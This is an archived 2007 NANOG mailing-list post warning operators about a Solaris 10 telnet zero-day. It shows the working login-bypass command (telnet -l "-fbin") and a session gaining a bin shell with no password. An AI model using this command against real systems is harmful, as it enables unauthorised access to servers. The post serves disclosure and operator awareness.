[94844] in North American Network Operators' Group
Solaris 10 Telnet Exploit
daemon@ATHENA.MIT.EDU (William Schultz)
Sun Feb 11 22:39:38 2007
To: nanog@merit.edu
From: William Schultz <wschultz@bsdboy.com>
Date: Sun, 11 Feb 2007 19:30:27 -0800
Errors-To: owner-nanog@merit.edu
http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day-
disable.html
Tested on Sol10, and it indeed works... Good thing we use SSH, right?!
################################
iWil:~ wschultz$ telnet -l "-fbin" dns1
Trying A.B.C.D...
Connected to dns1.my.com.
Escape character is '^]'.
Last login: Sun Feb 11 18:11:05 from A.B.C.D
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
$ id
uid=2(bin) gid=2(bin)
$
################################
